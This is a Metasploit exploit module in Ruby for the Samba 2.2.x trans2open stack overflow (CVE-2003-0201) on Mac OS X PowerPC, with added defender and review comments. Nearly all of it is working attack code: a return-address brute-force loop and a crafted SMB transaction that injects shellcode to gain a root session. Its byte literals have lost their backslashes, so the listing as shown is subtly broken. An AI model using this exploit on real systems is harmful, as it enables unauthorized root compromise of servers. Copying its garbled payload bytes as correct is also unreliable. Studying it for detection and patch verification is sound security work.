# Title : Samba 2.2.0 - 2.2.8 trans2open Overflow (OS X)
# Published : 2003-04-07
# Author : H D Moore
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
# Metasploit module for the Samba 2.2.0 - 2.2.8 trans2open stack overflow
# (CVE-2003-0201 per the references below), targeting the Mac OS X PowerPC
# build of smbd. The bug was fixed upstream in Samba 2.2.8a; exposure is
# limited to hosts still running a vulnerable 2.2.x smbd reachable on the
# NetBIOS session port (139 by default here).
#
# Defender notes, grounded in what the module does below:
# - The return address is brute-forced, so a single run opens and drops one
#   SMB session per candidate address (connect/smb_login/put/disconnect in a
#   loop) until a session is created or an unexpected error occurs. A burst
#   of short-lived SMB sessions from one client, presumably paired with
#   repeated smbd child crashes on the server, is the observable footprint.
# - The malicious request is a single fixed SMB transaction header followed
#   by a ~2 KB attacker-controlled blob; inspection of trans2 request sizes
#   on port 139/445 is a reasonable network-side detection point.
class Metasploit3 < Msf::Exploit::Remote
  include Msf::Exploit::Remote::SMB

  # Registers module metadata with the framework.
  #
  # @param info [Hash] framework-supplied module info, merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Samba trans2open Overflow (Mac OS X)',
      'Description' => %q{
        This exploits the buffer overflow found in Samba versions
        2.2.0 to 2.2.8. This particular module is capable of
        exploiting the bug on Mac OS X PowerPC systems.
      },
      'Author' => [ 'hdm' ],
      'Version' => '$Revision$',
      'References' =>
        [
          [ 'CVE', '2003-0201'],
          [ 'OSVDB', '4469'],
          [ 'BID', '7294'],
          [ 'URL', 'http://www.digitaldefense.net/labs/advisories/DDI-1013.txt'],
        ],
      # smbd runs as root, so a successful session is privileged.
      'Privileged' => true,
      'Payload' =>
        {
          # Payload space is capped at 1024 bytes; with the payload placed at
          # offset 3 of the 1988-byte pattern (see exploit), it cannot reach
          # the return-address run that starts at offset 1195.
          'Space' => 1024,
          # NOTE(review): as listed, this is the three ASCII characters "x00";
          # the byte escape appears to have lost its backslash in extraction.
          'BadChars' => "x00",
          'MinNops' => 512,
        },
      'Platform' => 'osx',
      'Arch' => ARCH_PPC,
      'Targets' =>
        [
          # 'Rets' => [ start address, lowest address, step ]: the exploit
          # method walks downward from Rets[0] to Rets[1] in Rets[2]-byte steps.
          ['Stack Brute Force', { 'Rets' => [0xbffffdfc, 0xbfa00000, 512] } ],
        ],
      'DisclosureDate' => 'Apr 7 2003',
      'DefaultTarget' => 0))

    register_options(
      [
        # NetBIOS session service; the SMB mixin uses this as the target port.
        Opt::RPORT(139)
      ], self.class)
  end

  # Need to perform target detection
  #
  # Returning false opts this module out of the framework's automatic
  # exploitation selection (presumably because it brute-forces a return
  # address rather than fingerprinting the target first).
  #
  # @return [Boolean] always false
  def autofilter
    false
  end

  # Brute-forces the stack return address, one SMB session per attempt.
  #
  # Loop invariant: curr_ret steps down from Rets[0] to Rets[1] by Rets[2]
  # and the loop exits early once the framework reports a session.
  # An EOFError (connection closed by the peer, likely a crashed smbd child)
  # is treated as "wrong address, try the next one"; any other error is
  # printed and aborts the run.
  #
  # @return [void]
  def exploit
    curr_ret = target['Rets'][0]
    while (curr_ret >= target['Rets'][1])
      break if session_created?
      begin
        print_status("Trying return address 0x%.8x..." % curr_ret)
        connect
        smb_login

        # 1988 is required for findrecv shellcode
        pattern = rand_text_english(1988)

        # This stream covers the framepointer and the return address
        # (16 big-endian copies of curr_ret, 64 bytes, at offset 1195)
        pattern[1195, 64] = [curr_ret].pack('N') * 16

        # Stuff the shellcode into the request
        # (encoded payload overwrites the pattern starting at offset 3)
        pattern[3, payload.encoded.length] = payload.encoded

        # Fixed SMB transaction header followed by the pattern.
        # NOTE(review): as listed, these literals are plain ASCII ("x00x04...")
        # rather than byte escapes; the backslashes appear to have been
        # stripped by extraction, so this listing does not emit the bytes the
        # comments describe.
        trans =
          "x00x04x08x20xffx53x4dx42x32x00x00x00x00x00x00x00"+
          "x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00"+
          "x64x00x00x00x00xd0x07x0cx00xd0x07x0cx00x00x00x00"+
          "x00x00x00x00x00x00x00xd0x07x43x00x0cx00x14x08x01"+
          "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"+
          "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x90"+
          pattern

        sock.put(trans)
        # Give the payload handler a chance to pick up a session before the
        # next attempt.
        handler
        disconnect
      rescue EOFError
        # Peer closed the connection; fall through to the next candidate.
      rescue => e
        print_status("Caught exception: #{e}")
        break
      end

      curr_ret -= target['Rets'][2]
    end
  end
end